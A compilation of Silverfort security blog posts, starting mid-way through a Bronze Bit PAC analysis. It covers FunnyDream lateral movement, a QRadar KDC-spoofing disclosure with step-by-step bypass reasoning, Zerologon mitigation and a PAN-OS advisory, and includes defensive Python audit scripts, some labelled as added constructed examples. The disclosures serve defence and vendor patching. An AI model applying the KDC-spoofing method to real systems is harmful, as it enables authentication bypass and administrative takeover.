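# CVE-2020-17049 patch introduced, as MS-PAC 2.8.3 quoted above states.
PAC_LOGON_INFO = 0x01
PAC_SERVER_CHECKSUM = 0x06
PAC_PRIVSVR_CHECKSUM = 0x07   # KDC signature, made with the krbtgt key
PAC_CLIENT_INFO = 0x0A
PAC_TICKET_CHECKSUM = 0x10    # new ticket signature, also krbtgt-keyed
SIGNATURE_BUFFERS = {PAC_SERVER_CHECKSUM: "server",
                     PAC_PRIVSVR_CHECKSUM: "kdc",
                     PAC_TICKET_CHECKSUM: "ticket"}

# PAC_SIGNATURE_DATA.SignatureType -> Signature length in bytes (MS-PAC 2.8)
KERB_CHECKSUM_HMAC_MD5 = 0xFFFFFF76
HMAC_SHA1_96_AES128 = 0x0F
HMAC_SHA1_96_AES256 = 0x10
SIGNATURE_LEN = {KERB_CHECKSUM_HMAC_MD5: 16, HMAC_SHA1_96_AES128: 12, HMAC_SHA1_96_AES256: 12}


@dataclass
class PacBuffer:
    ul_type: int
    data: bytes


def parse_pac(pac):
    """Walk the PACTYPE header (cBuffers, Version, PAC_INFO_BUFFER[]) and slice out
    every buffer in declaration order. Offsets are relative to the PAC start."""
    if len(pac) < 8:
        raise ValueError("PAC too short for PACTYPE header")
    c_buffers, version = struct.unpack_from("<II", pac, 0)
    if version != 0:
        raise ValueError(f"unsupported PAC version {version}")
    if 8 + 16 * c_buffers > len(pac):
        raise ValueError("PAC_INFO_BUFFER array runs past end of PAC")
    buffers = []
    for i in range(c_buffers):
        ul_type, cb_size, offset = struct.unpack_from("<IIQ", pac, 8 + 16 * i)
        if offset % 8 or offset + cb_size > len(pac):
            raise ValueError(f"buffer {i} (type 0x{ul_type:02x}) has a bad offset or size")
        buffers.append(PacBuffer(ul_type, pac[offset:offset + cb_size]))
    return buffers


def parse_signature(data):
    """Split a PAC_SIGNATURE_DATA blob into (SignatureType, Signature bytes)."""
    (sig_type,) = struct.unpack_from("<I", data, 0)
    length = SIGNATURE_LEN.get(sig_type)
    if length is None or len(data) < 4 + length:
        raise ValueError(f"unknown or truncated signature type 0x{sig_type:08x}")
    return sig_type, data[4:4 + length]


def audit_pac(pac, service_ticket=True):
    """Report which signatures a PAC carries. Presence only: verifying the KDC and
    ticket signatures needs the krbtgt key, which a service does not hold."""
    buffers = parse_pac(pac)
    report = {"types": [b.ul_type for b in buffers], "signatures": {}, "findings": []}
    for buf in buffers:
        name = SIGNATURE_BUFFERS.get(buf.ul_type)
        if name:
            sig_type, _ = parse_signature(buf.data)
            report["signatures"][name] = sig_type
    for name in ("server", "kdc"):
        if name not in report["signatures"]:
            report["findings"].append(f"missing {name} signature")
    # MS-PAC 2.8.3: tickets not encrypted to krbtgt or a trust account SHOULD carry it
    if service_ticket and "ticket" not in report["signatures"]:
        report["findings"].append("no ticket signature: KDC cannot detect a tampered ticket")
    return report


def build_pac(buffers):
    """Constructed helper (not from the post): serialize (ulType, data) pairs into a
    PACTYPE blob, padding each buffer to the 8-byte alignment MS-PAC requires."""
    header_len = 8 + 16 * len(buffers)
    entries, body = [], bytearray()
    for ul_type, data in buffers:
        entries.append(struct.pack("<IIQ", ul_type, len(data), header_len + len(body)))
        body += data + b"\x00" * (-len(data) % 8)
    return struct.pack("<II", len(buffers), 0) + b"".join(entries) + bytes(body)


# Constructed samples: stub logon/client buffers and zeroed placeholder signatures.
_hmac_md5_sig = struct.pack("<I", KERB_CHECKSUM_HMAC_MD5) + bytes(16)   # 20 bytes
PRE_PATCH_PAC = build_pac([
    (PAC_LOGON_INFO, bytes(40)),
    (PAC_CLIENT_INFO, bytes(24)),
    (PAC_SERVER_CHECKSUM, _hmac_md5_sig),
    (PAC_PRIVSVR_CHECKSUM, _hmac_md5_sig),
])
POST_PATCH_PAC = build_pac([
    (PAC_LOGON_INFO, bytes(40)),
    (PAC_CLIENT_INFO, bytes(24)),
    (PAC_SERVER_CHECKSUM, _hmac_md5_sig),
    (PAC_PRIVSVR_CHECKSUM, _hmac_md5_sig),
    (PAC_TICKET_CHECKSUM, _hmac_md5_sig),   # the extra 20-byte field
])

if __name__ == "__main__":
    for label, pac in (("pre-patch", PRE_PATCH_PAC), ("post-patch", POST_PATCH_PAC)):
        print(label, len(pac), "bytes:", audit_pac(pac))
```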
This flag sets the forwardable flag to False, but the ticket never gets validated by the KDC in case of modification.

### Final Words

Disclosure of a new vulnerability always arouses interest among security researchers. Typically, such disclosure doesn't involve a detailed description of the bits and bytes entailed. While this might make sense from the operational perspective, it's equally important to leverage such disclosures to get better insights into the software implementation, in this case the Kerberos delegation mechanism. If Knowledge is Power, I hope this analysis has made us a bit stronger.

---

- Published: 2020-11-25
- Modified: 2024-03-13
- URL: https://www.silverfort.com/blog/funnydream-apt-campaign-lateral-movement/

*By Keshet, Director of Product Marketing, Silverfort*

A new APT campaign, dubbed 'FunnyDream', has been discovered by security researchers. The campaign primarily targeted South East Asian governments. Attack findings have been reported since October 2018. The investigation of the APT group's espionage activity shows evidence of lateral movement. It seems that compromised credentials were used to execute many batch files with scheduled tasks and WMI on remote machines. Further evidence shows that the attackers used the wmiexec.vbs script to run remote commands. This is a painful reminder that lateral movement is still a blind spot, due to a critical gap in the standard security product stack of most organizations. In this blog we will explain how lateral movement is executed in this attack, and then zoom in on how Silverfort's innovative technology can block lateral movement altogether, by identifying its abnormal authentication patterns and enforcing security policies on command line remote access tools.
### FunnyDream Campaign Overview

The FunnyDream campaign targeted high-profile entities in Malaysia, Taiwan, the Philippines and Vietnam. It features a highly sophisticated custom-made persistence mechanism using advanced backdoors and droppers to facilitate silent and long-term data collection and exfiltration. Following the initial infection and implementation of the persistence mechanism, evidence suggests that the FunnyDream threat actors sought and succeeded in compromising their victims' domain controllers. They then executed extensive lateral movement activity using scheduled tasks and WMI, with a special preference for using wmiexec.vbs to explore and execute code on remote machines.

### Lateral Movement: Legitimate by Design, Malicious by Context

Lateral movement, as seen in APT campaigns such as FunnyDream, can be executed using legitimate remote admin tools such as PsExec, PowerShell or, in the case of FunnyDream, WMI, to explore and access resources in the network. These tools eliminate the need to discover zero-day vulnerabilities, develop exploits, or craft a complicated backdoor, since these admin tools are purposely built to enable network and infrastructure operators to seamlessly access any remote machine. In other words, these tools are by design both incredible productivity drivers and lethal blades in the hands of attackers.

### Lateral Movement Presents Challenges to Security Products

There are two reasons why lateral movement is difficult to detect and prevent with common security solutions:

- The attack is performed using legitimate, yet compromised, credentials: this means that, in practice, what you see is merely a login with valid user credentials. There is no explicit indication that the credentials used are in fact compromised.
- Real-time detection of abnormal behavior is difficult due to the complexity of these attacks: some solutions like EDR, NDR and SIEM can detect a potential anomaly after lateral movement has occurred and generate a retroactive alert. However, since they don't detect it in real time, they can't block it.

To better illustrate the point: malicious activity, by definition, deviates from legitimate activity. For example, in the case of malware or exploits, it's a deviation from the standard behavior of a process, followed by its immediate termination by the endpoint protection. In the case of mass data exfiltration, it's a deviation from the standard patterns of network traffic which, once detected, triggers immediate blocking by the network protection product. And so on. However, when legitimate credentials are used to access resources, the deviation would be seen only in the user's activity. And, if an anomaly in the user's activity is detected, it should be followed by an immediate response: either blocking the user's access, or requiring the user to re-authenticate in order to verify the true identity of the user. This is where Silverfort comes into play.

### Silverfort: The First Unified Identity Platform

Silverfort is the first Unified Identity Protection Platform that was purpose-built to secure organizations against identity-based attacks that use compromised credentials to access targeted resources. Silverfort integrates with your IAM infrastructure to monitor all the authentication activity in the network, to both cloud and on-prem resources, for continuous risk analysis and access policy enforcement.

### Paradigm Shift: Block Lateral Movement by Stepping Up Authentication Requirements in Real Time

Silverfort's holistic visibility into the entire authentication activity of each user enables it to evaluate with unmatched precision the behavior profile of your users.
It continuously calculates the risk of each access request compared to the observed behavior of the user and their community. To read more about this, see the blog: Detecting and Predicting Malicious Access in Enterprise Networks Using the Louvain Community Detection Algorithm.

When Silverfort identifies abnormal activity, as happens with lateral movement attacks, it can step up the authentication requirements in real time to block access, or require the user to authenticate with an MFA of choice (it can be Silverfort's agentless MFA solution or a 3rd-party MFA solution). Silverfort is the only solution that is capable of enforcing MFA on the command line remote access tools that are the bread and butter of lateral movement. While traditionally MFA is not considered a native part of the counter-APT arsenal in the post-compromise lateral movement stage, applying it to such command line tools, in combination with adaptive risk policies, provides simple yet effective protection against these threats.

### How Does it Work?

Let's illustrate this using the 'FunnyDream' lateral movement example:

1. The attacker attempts to log in to a machine with wmiexec.vbs, using compromised user credentials.
2. The Silverfort recommended policy for the use of WMI for remote access requires MFA. Hence, the actual user, the legitimate user who owns the credentials, is prompted to verify the authentication.
3. The attacker can't complete the authentication, so access to the resource is blocked.
4. The SOC is immediately notified by Silverfort about the attempt to use wmiexec.vbs, allowing the security team to further investigate and eradicate the malicious presence from their network.

To learn more about Silverfort's ability to block lateral movement attacks, please watch our on-demand webinar: Can You Detect and Block the Evasive Threat of Lateral Movement?

We hope we managed to explain in this blog how Silverfort mitigates these threats and blocks lateral movement.
However, we're always happy to discuss this further. Let us know if you have any questions or if you'd like to see a full demo of this solution: Request a Demo

---

- Published: 2020-10-13
- Modified: 2024-03-13
- URL: https://www.silverfort.com/blog/third-kdc-spoofing-ibm-qradar-cve-2019-4545/

*By Yoav Iellin, Yaron Kassner, Dor Segal & Rotem Zach, Silverfort*

KDC spoofing never gets old. We disclosed KDC spoofing vulnerabilities in Cisco ASA and Palo Alto Networks PAN-OS back in May 2020. Now we can share that IBM QRadar is also vulnerable due to the way Kerberos has been implemented. The KDC Spoofing vulnerability allows an attacker to bypass the Kerberos authentication to QRadar and, as a result, gain administrative access to the system. We have been working closely with IBM engineers to help fix this issue, resulting in the recently issued security bulletin. This blog post outlines the vulnerability, explains how to avoid these vulnerabilities as a developer implementing Kerberos, and talks about mitigation for organizations using QRadar and other systems using Kerberos.

### Explaining the Vulnerability

IBM QRadar Security Information and Event Management (SIEM) helps security teams detect and prioritize threats across the enterprise, and provides important insights that enable teams to respond quickly to reduce the impact of incidents. The vulnerability lies in IBM's implementation of the Kerberos protocol. Kerberos is the most common authentication protocol for on-premises authentication. It is widely used in corporate networks due to the popularity of Active Directory, and it is preferred over weaker authentication protocols such as NTLM. IBM uses the Kerberos authentication protocol for authenticating administrative access. Therefore, bypassing Kerberos authentication allows an attacker to gain administrative access to IBM QRadar, view sensitive information and potentially alter logs, without having legitimate credentials.
For the Kerberos protocol to work, three things should happen:

- the user authenticates to the server
- the server authenticates to the client
- the KDC authenticates to the server

Apparently, KDC authentication to the server is often overlooked, perhaps because requiring it complicates the configuration requirements. However, if the KDC does not authenticate to the server, the security of the protocol is entirely compromised, allowing an attacker who has hijacked the network traffic to authenticate to QRadar with any password, even a wrong one. For Kerberos terminology and background about how a KDC spoofing attack works, see the end of this blog post.

### How We Discovered the Vulnerability in QRadar

Admin access to QRadar should be protected with strong authentication to prevent unauthorized access and system tampering. Using AD authentication is a popular option. When an admin authenticates to QRadar, it uses a number of parameters to authenticate the admin (see below a snapshot of the implementation guide taken from here). First, QRadar requests a TGT from AD. After receiving the TGT, QRadar requests a service ticket for LDAP authentication to the domain controller. If successful, QRadar uses SASL to authenticate with LDAP to the DC. It uses the service ticket to prove the identity of the user.

### Spoofing Kerberos/SASL authentication

Here are the steps an attacker would take to spoof a DC to bypass this kind of authentication. Let's assume that we have the ability to hijack the network communication between QRadar and the DC. In this case, we can create a fake DC with a username identical to the admin's username and a password of our choice. Then we initiate an authentication to QRadar and use the user and password we chose.
QRadar authenticates with Kerberos, and we hijack the Kerberos communication and return an AS_REP that corresponds to the password we chose, and a TGS_REP that consists of a service ticket encrypted with a service session key of our choice, and a session key of our choice encrypted with the password that we chose. Since at these phases the only verification done on the QRadar side relies on the password we chose, QRadar should not reject the authentication at this point. Now that QRadar has received the service ticket, it can initiate an LDAP request to the DC. We will hijack the LDAP traffic as well. We have two options at this point:

1. LDAP is being used without TLS. In this case we can hijack the LDAP traffic. QRadar sends a bind request to the DC with a Kerberos AP_REQ message, which contains the service ticket we have. We can return an AP_REP that is based on the service session key we chose, and QRadar will accept it.
2. LDAPS has been configured. In this case we cannot return an answer on behalf of the DC, because TLS is being used to authenticate the DC, assuming the certificate has been configured on the QRadar side.

### Spoofing Kerberos/SASL/LDAPS Authentication for QRadar

Before giving up on option 2, we noticed the following odd behavior. If we configure an IP address as the server URL, authentication still works. Theoretically, authentication with an IP address should not work, because Kerberos does not allow authentication to IP addresses unless an SPN has been explicitly configured. When sending the TGS_REQ, QRadar requests a ticket to ldap/. Since the DC does not have a Service Principal Name (SPN) by that name, it returns a KRB_ERR_S_PRINCIPAL_UNKOWN error. According to the Kerberos protocol, QRadar is supposed to deny the authentication at this point. However, a network capture reveals that an LDAP request is opened even after the error, and immediately reset by QRadar. Then, the user is able to log in.
We conclude that QRadar considers the authentication successful even before the completion of the Kerberos application exchange. This can be easily exploited. As attackers, we can send a KRB_ERR_S_PRINCIPAL_UNKOWN right after spoofing the AS_REP, and cause QRadar to accept an authentication with a password of our choice. The attack is depicted below.

An additional bug in QRadar causes it to request authentication from AD for a user that does not necessarily exist. QRadar has a built-in local admin user. It turns out that when attempting authentication with the admin user, QRadar first tries to authenticate to the DC with Kerberos. This username does not have to exist in AD. This makes the attack easier, because the username is known to the attacker in advance. In addition, this bug could be considered a vulnerability on its own. Regardless of KDC Spoofing, if an attacker can obtain privileges for creating users in AD, e.g. by taking over a help desk account, the attacker can create a user called admin in AD. Then the attacker can use that user to authenticate to QRadar.

### Exploitation

Now that we knew that QRadar is vulnerable, we simulated an attack by redirecting the traffic between QRadar and the KDC (in this case a domain controller) on port 88 (the Kerberos port) to our own Windows Server. We set up a fake domain on the Windows server and made sure there is a user with the same UPN as the QRadar administrator in the real domain. We configured that user's password to be "1" in the fake domain. We then tried the following situations:

- Regular login (traffic not diverted): we managed to log in with the administrator's original password, as expected. When trying the password "1", the login failed.
- Logging in with the traffic diverted to our fake DC: logging in with the administrator's original password failed, but logging in with the password "1" worked.

### IBM's Mitigation

IBM's approach to mitigating this vulnerability is simple and secure.
Since the exact same functionality of authentication to QRadar can be achieved with LDAPS, the recommended mitigation is to simply switch from Kerberos to LDAPS authentication. After that you should install the patch by IBM. The patch will verify that the authentication is indeed set to LDAPS and fail if you haven't switched to LDAPS authentication yet. This is to make sure that your system is secure after the patch. If you have been using Silverfort to secure authentication to your QRadar, you will also need to update the Silverfort policy for QRadar to protect the LDAPS authentication rather than the Kerberos TGT request.

### Prevention and Mitigation

### Mitigation Steps for Security Professionals

1. Switch authentication in your QRadar from Kerberos to LDAPS.
2. Upgrade your QRadar to a fixed version.
3. Update your Silverfort policy for QRadar accordingly.
4. Continuously monitor your Kerberos authentication. Look for resources that request only AS_REQ. If there are no TGS_REQs, it's a red flag.
5. Use Silverfort's open source tool to search the authentication logs for services that don't request service tickets.
6. See the developer recommendations for any internally developed applications that implement Kerberos and systems you configured by yourself.

### As a Developer

We recommend a few steps to make sure that your solution is not susceptible to KDC spoofing:

1. Validate that the implementation of Kerberos requires a password or keytab: to validate the DC, you need to use some kind of shared secret. If your solution does not enable configuring a keytab file or a service account password, the application is surely susceptible to KDC spoofing.
2. Run Wireshark: use Wireshark to see what Kerberos requests are sent during authentication. If there is no TGS_REQ, it's a red flag.
3. If you want to implement an authentication protocol yourself, you must follow the protocol RFCs diligently.
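Steps 4 and 5 above and developer step 2 reduce to one heuristic: a client that completes the AS exchange but never asks for a service ticket is trusting the KDC's answer alone, and that answer only needs the password the attacker chose. As an added example (not Silverfort's open source tool), the following Python audit applies that heuristic, plus two signals from the QRadar case, to constructed Kerberos message summaries; the log format, hosts and usernames are assumptions.

```python
import re
from collections import defaultdict
from ipaddress import ip_address

# Constructed sample of Kerberos message summaries, one message per line, in the
# shape a network sensor or KDC audit feed might emit. Hosts and users are made up.
# 10.1.1.20 behaves correctly; 10.1.1.50 stops after the AS exchange; 10.1.1.51
# asks for an SPN with an IP host and gets KRB-ERROR 7 (KDC_ERR_S_PRINCIPAL_UNKNOWN
# in RFC 4120, the error the post describes) instead of a service ticket.
SAMPLE_LOG = """\
2020-10-13T09:00:01Z client=10.1.1.20 type=AS-REQ cname=jdoe sname=krbtgt/CORP.LOCAL
2020-10-13T09:00:01Z client=10.1.1.20 type=AS-REP cname=jdoe
2020-10-13T09:00:02Z client=10.1.1.20 type=TGS-REQ cname=jdoe sname=ldap/dc1.corp.local
2020-10-13T09:00:02Z client=10.1.1.20 type=TGS-REP cname=jdoe sname=ldap/dc1.corp.local
2020-10-13T09:05:00Z client=10.1.1.50 type=AS-REQ cname=admin sname=krbtgt/CORP.LOCAL
2020-10-13T09:05:00Z client=10.1.1.50 type=AS-REP cname=admin
2020-10-13T09:10:00Z client=10.1.1.51 type=AS-REQ cname=admin sname=krbtgt/CORP.LOCAL
2020-10-13T09:10:00Z client=10.1.1.51 type=AS-REP cname=admin
2020-10-13T09:10:01Z client=10.1.1.51 type=TGS-REQ cname=admin sname=ldap/10.1.1.5
2020-10-13T09:10:01Z client=10.1.1.51 type=KRB-ERROR cname=admin error=7
"""

FIELD_RE = re.compile(r"(\w+)=(\S+)")


def parse_line(line):
    """Turn '<timestamp> key=value ...' into a dict; the timestamp goes under 'ts'."""
    ts, _, rest = line.partition(" ")
    rec = dict(FIELD_RE.findall(rest))
    rec["ts"] = ts
    return rec


def spn_host_is_ip(sname):
    """True if the host part of an SPN (class/host[@REALM]) is an IP literal,
    which a DC will not have registered unless someone added it by hand."""
    host = sname.split("/", 1)[1] if "/" in sname else sname
    host = host.split("@", 1)[0]
    try:
        ip_address(host)
        return True
    except ValueError:
        return False


def audit_kerberos(log_text):
    """Return (client, finding) pairs for clients whose Kerberos usage would let a
    spoofed KDC log them in. Findings:
      AS_ONLY             - AS exchange seen but no TGS-REQ in the window: the client
                            treats the AS-REP as proof, and an AS-REP needs only the
                            password, which a fake KDC knows
      IP_SPN              - service ticket requested for an IP-based SPN
      TGS_ERROR_NO_TICKET - TGS-REQ answered with KRB-ERROR and never with a TGS-REP;
                            if access was still granted, the AP exchange was skipped
    """
    by_client = defaultdict(list)
    for line in log_text.splitlines():
        if line.strip():
            rec = parse_line(line)
            by_client[rec["client"]].append(rec)

    findings = []
    for client, msgs in by_client.items():
        types = [m["type"] for m in msgs]
        if "AS-REQ" in types and "TGS-REQ" not in types:
            findings.append((client, "AS_ONLY"))
        for i, m in enumerate(msgs):
            if m["type"] != "TGS-REQ":
                continue
            if spn_host_is_ip(m.get("sname", "")):
                findings.append((client, "IP_SPN"))
            later = msgs[i + 1:]
            got_ticket = any(x["type"] == "TGS-REP" for x in later)
            got_error = any(x["type"] == "KRB-ERROR" for x in later)
            if got_error and not got_ticket:
                findings.append((client, "TGS_ERROR_NO_TICKET"))
    return findings


if __name__ == "__main__":
    for client, finding in audit_kerberos(SAMPLE_LOG):
        print(f"{client}: {finding}")
```

Run it over a whole observation window rather than single sessions, since a client that only renews a TGT in a short capture would otherwise look like an AS_ONLY case.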
We recommend taking the easier route and using an existing implementation of these protocols. 4. Use 3rd party libraries properly – some 3rd party libraries require specific configuration to avoid KDC spoofing. For example, a common library used for Kerberos called pam-krb5, has to have a keytab configured to work properly. Here is the relevant paragraph from their documentation (https://github. com/rra/pam-krb5/blob/master/README. md) What’s Next? We’ve discovered another KDC spoofing vulnerability and hope to write about it soon, but not before the vendor publishes a patch. Until then, stay tuned. Background An overview of the Kerberos Protocol The Kerberos authentication protocol was developed in the 1980s by Steve Miller and Clifford Neuman. It allows Single Sign-On (SSO) in a managed network and its Active Directory (AD) implementation has turned it into the primary authentication protocol for on-premises enterprise environments. The protocol consists of three exchanges to provide mutual authentication for the user and the server accessed. When the user log ins, they enter their credentials and the Authentication Service (AS) exchange takes place. The user gets a Ticket Granting Ticket (TGT), which is later used to obtain tickets to specific services during the Ticket Granting Service (TGS) Exchange. The ticket is then used during the Client/Server Exchange to complete the authentication: 1. Authentication Service (AS) Exchange During the AS exchange the user authenticates with the Key Distribution Center (KDC). In return, the user obtains the ticket and key required to authenticate with services in the network without re-entering the credentials. When the user first enters the credentials, the client sends an AS_REQ to the Authentication Service (AS) function of the KDC. The AS_REQ is a message signed by the Master Key, which is a function of the user’s password. 
The Authentication Service, which is part of the KDC, verifies the AS_REQ according the master key, which is also available to the KDC. After validation the AS_REQ, the KDC returns an AS_REP, which contains a logon session key and a Ticket-Granting Ticket (TGT), that is encrypted with the KDC’s key. The AS Exchange is outlined below. The TGT will be used by the TGS exchange to obtain access to specific services. 2. Ticket-Granting Service (TGS) Exchange When the user attempts to access a service in the network, the user sends a TGS_REQ to the Ticket Granting Server (TGS) function of the KDC. This message is encrypted with the logon session key, which is obtained during the AS Exchange. The TGS_REQ is verified by the TGS, which then returns a TGS_REP. The TGS_REP contains a service session key and a service ticket, which is encrypted with the master key of the server that hosts the service. The master key of the server in a Unix-based system is configured in a file called a keytab file. The master key of the server in a member server is derived from the computer account’s password. The TGS Exchange is outlined below. 3. Client/Server Exchange Now the client has everything it needs to authenticate... --- - Published: 2020-09-24 - Modified: 2024-03-13 - URL: https://www.silverfort.com/blog/zerologon-patching-is-not-enough/ Guidelines and Tools for Protecting Your Environment from CVE-2020-1472 By Yaron Kassner, CTO and Co Founder, Silverfort Secura recently published a whitepaper about one of the worst vulnerabilities that I’ve seen in a while. It’s called ZeroLogon, a. k. a. CVE-2020-1472. The DHS also published an emergency directive to patch affected Windows Servers. And they’re not exaggerating – the vulnerability lets an attacker create a domain admin account, just by sending unauthenticated packets to a domain controller. This means that anyone in the network can take over the entire domain. 
For those interested in the technical bits and bytes, I highly recommend reading the whitepaper. The described attack is elegant and takes advantage of an inherent vulnerability in the Netlogon Remote Protocol (NRPC). It turns out that some people were so interested in this attack that they developed a full working exploit and published it on GitHub. So, if you have not deployed the update yet, stop reading this article and do it now. Come back after you do.

As with most vulnerabilities, Microsoft published an advisory along with a security update. While some may be tempted to install the update and forget about it, the careful reader will notice this comment: "Microsoft is addressing this vulnerability in a phased rollout." Yep, it is not a good thing. A phased rollout means that during the first phase your system is still vulnerable.

A phased approach had to be taken in this case because the vulnerability is inherent in the NRPC protocol. The patch prevents the attack by enforcing an additional layer of security on top of the protocol, namely Secure RPC (signing and sealing of the Netlogon secure channel). Unfortunately, it is not enough to update the server side, i.e. the DC, because the clients also need to be updated for the protocol to work. Microsoft took care of Windows devices, but it did not provide a solution for legacy operating systems that are no longer supported, or for third-party products. This means that enforcing Secure RPC will break these incompatible systems. During the first phase, AD enforces Secure RPC for Windows devices, which means the worst form of the attack can be prevented, but other clients may still be vulnerable.

We developed a simple tool that iterates over the domain controllers in your domain and checks whether all of them are patched. The tool is based on the original testing tool published by Secura, but instead of running against one DC at a time, it automatically finds the DCs and runs against all of them.
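The post goes on to recommend auditing for clients that still use non-secure Netlogon RPC before switching the domain to enforcement mode. The following Python triage is an added example, not Silverfort's tool and not code from the original post. It works over the Netlogon audit event IDs 5827 to 5831 that the CVE-2020-1472 update adds to the System log on domain controllers; the sample records are constructed, and the field names (`account`, `domain`, `os`, `ip`) are this example's own assumptions that you would map from your log collector's schema.

```python
from collections import defaultdict

# Netlogon audit events the CVE-2020-1472 update adds to the NETLOGON source in the System log.
# Which ID a client triggers tells you where it stands in the phased rollout.
DENIED = {5827: "machine account", 5828: "trust account"}             # vulnerable connection refused
ALLOWED_BY_PHASE = {5829}                                              # allowed only because enforcement is off
ALLOWED_BY_POLICY = {5830: "machine account", 5831: "trust account"}   # allowed by the GPO allow list

# Constructed sample records (not real logs). Field names are assumptions for this example,
# chosen to mirror the event's message fields; map your collector's field names onto them.
SAMPLE_EVENTS = [
    {"id": 5829, "account": "PRINTER01$", "domain": "CORP", "os": "Embedded", "ip": "10.0.1.17"},
    {"id": 5829, "account": "PRINTER01$", "domain": "CORP", "os": "Embedded", "ip": "10.0.1.17"},
    {"id": 5829, "account": "NAS02$", "domain": "CORP", "os": "Linux", "ip": "10.0.1.40"},
    {"id": 5830, "account": "NAS02$", "domain": "CORP", "os": "Linux", "ip": "10.0.1.40"},
    {"id": 5827, "account": "OLDXP$", "domain": "CORP", "os": "Windows XP", "ip": "10.0.2.9"},
    {"id": 5831, "account": "PARTNER$", "domain": "PARTNER", "os": "", "ip": "192.168.7.3"},
]


def triage_netlogon(events):
    """Bucket clients that still use non-secure Netlogon RPC.

    blocking_enforcement: seen with 5829 and never with 5830/5831. Turning enforcement on now
                          breaks them unless they are fixed or added to the allow policy.
    allow_listed:         already covered by the policy (still vulnerable, still to be fixed).
    denied:               the DC is already refusing their vulnerable connections.
    """
    phase, policy, denied, meta = defaultdict(int), set(), defaultdict(int), {}
    for e in events:
        key = (e["domain"], e["account"])
        meta[key] = (e["os"], e["ip"])
        if e["id"] in ALLOWED_BY_PHASE:
            phase[key] += 1
        elif e["id"] in ALLOWED_BY_POLICY:
            policy.add(key)
        elif e["id"] in DENIED:
            denied[key] += 1
    blocking = {k: n for k, n in phase.items() if k not in policy}
    return {
        "blocking_enforcement": {
            f"{d}\\{a}": {"events": n, "os": meta[(d, a)][0], "ip": meta[(d, a)][1]}
            for (d, a), n in sorted(blocking.items())
        },
        "allow_listed": sorted(f"{d}\\{a}" for d, a in policy),
        "denied": {f"{d}\\{a}": n for (d, a), n in sorted(denied.items())},
    }


if __name__ == "__main__":
    for bucket, clients in triage_netlogon(SAMPLE_EVENTS).items():
        print(bucket, clients)
```

The `blocking_enforcement` bucket is the list to work through (vendor fix, decommission, or a temporary entry in the "Allow vulnerable Netlogon secure channel connections" policy) before you move the domain to enforcement; run it against events collected from every DC, since a client only talks to one of them at a time.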
We recommend that you run this tool to make sure none of the DCs in your environment have been missed: one unpatched DC is enough to compromise the entire domain.

Download the GitHub testing tool here

### Moving to Phase Two

In the second phase, AD enforces Secure RPC for all computers, including non-Windows devices. The second phase will be enabled automatically in February 2021, but you can start it earlier, and we recommend that you do. To do that, you should first make sure that you do not have any clients in the network that rely on non-secure RPC. Microsoft provides audit logs to discover such clients, and Silverfort can help as well: you can leverage Silverfort to prepare a report that lists clients that use non-secure RPC. If you do not have Silverfort, you can start by auditing Microsoft's event logs.

### What to Do with Non-Secure RPC Clients?

Here is my recommendation. First of all, add them to the "Domain controller: Allow vulnerable Netlogon secure channel connections" group policy. This does not secure these clients, but it allows you to move the rest of the devices into enforcement mode now instead of waiting for February 2021. After you have moved the rest of the devices into enforcement mode, you should take care of the non-secure RPC clients. Do not leave them as they are: they are vulnerable! If these are third-party devices, contact the vendor and ask for a solution that makes them work with Secure RPC. If for some reason you cannot make a client work with Secure RPC, Silverfort can help protect it; see below.

### How Can Silverfort Help Until All Non-Secure RPC Clients Are Covered?

Silverfort monitors and controls Netlogon traffic in the network. This allows Silverfort to detect all computers using non-secure RPC. For these devices, Silverfort can raise the risk level and provide additional layers of security, like stepping up the authentication requirements to or from these devices.

### Summarizing the Recommended Steps

1. Update your domain controllers.
2. Use Silverfort's open-source tool to see if any DCs were left unpatched.
3. Use Silverfort or Microsoft's audit logs to find clients using non-secure RPC.
4. Put non-secure RPC clients into the allow list.
5. Move the domain into enforcement mode as soon as possible.
6. Start a process to fix non-secure RPC clients or remove them from your network.
7. In the meantime, use Silverfort to protect vulnerable clients from exploitation and restrict their usage.

Yaron Kassner, CTO and Co-Founder, Silverfort

Silverfort's CTO and Co-Founder Yaron Kassner is a cybersecurity and big data technology expert. Before co-founding Silverfort, Yaron served as a big data expert consultant for Cisco. He also developed new capabilities involving big data analytics and machine learning algorithms at Microsoft. Prior to that, Yaron served in the elite 8200 cyber unit of the Israel Defense Forces, where he led a reputable R&D team, rose to the rank of Captain and received a prestigious excellence award. Yaron holds a B.Sc. in Mathematics, Summa Cum Laude, and an M.Sc. and Ph.D. in Computer Science from the Technion – Israel Institute of Technology.

---
- Published: 2020-09-24
- Modified: 2024-09-09
- URL: https://www.silverfort.com/blog/zerologon-patching-is-not-enough-2/

---
- Published: 2020-05-14
- Modified: 2024-03-13
- URL: https://www.silverfort.com/blog/silverfort-researchers-panw-pan-os-cve-2020-2002/

Palo Alto Networks published an advisory about a KDC spoofing vulnerability in PAN-OS that was discovered and responsibly disclosed to Palo Alto Networks by Silverfort researchers Yoav Iellin, Yaron Kassner and Rotem Zach. The vulnerability affected all supported versions of PAN-OS and all interfaces that used a Kerberos authentication profile. After the disclosure, Palo Alto Networks fixed all supported versions of PAN-OS and published an advisory. The vulnerability can allow an attacker to bypass Kerberos authentication to PAN-OS and gain access to the PAN-OS administrative interfaces, as well as to firewall sessions through the Captive Portal.
This vulnerability is similar to a KDC spoofing vulnerability our researchers discovered in Cisco ASA. It seems that the Kerberos authentication protocol is not always implemented completely and correctly, leaving systems vulnerable to exploits. Palo Alto Networks fixed this vulnerability in all supported versions of PAN-OS, and we highly recommend deploying the patch to protect against an exploit.

This article outlines the KDC spoofing vulnerability in PAN-OS and shows how it can be used to bypass authentication without knowing the password. It explains how to avoid such vulnerabilities, both as a developer implementing Kerberos and as an enterprise using Kerberos authentication for its systems.

### Explaining the Vulnerability

The vulnerability lies in Palo Alto Networks' Kerberos implementation. Kerberos is the most common protocol for on-premises authentication. It is widely available in corporate networks due to the popularity of Active Directory, and it is preferred over weaker authentication protocols such as NTLM. Palo Alto Networks uses Kerberos in many PAN-OS interfaces, for example SSL VPN, Captive Portal and administrator login. Therefore, bypassing Kerberos authentication allows an attacker to administer Palo Alto Networks Strata firewalls, bypass their security and gain access to additional networks.

For the Kerberos protocol to work, three things should happen:

- the user authenticates to the server
- the server authenticates to the client
- the KDC authenticates to the server

Apparently, KDC authentication to the server is often overlooked, perhaps because requiring it complicates the configuration. However, if the KDC does not authenticate to the server, the security of the protocol is entirely compromised: an attacker that hijacked the network traffic can authenticate to PAN-OS with any password, even a wrong one.
### Discovering the Vulnerability in PAN-OS

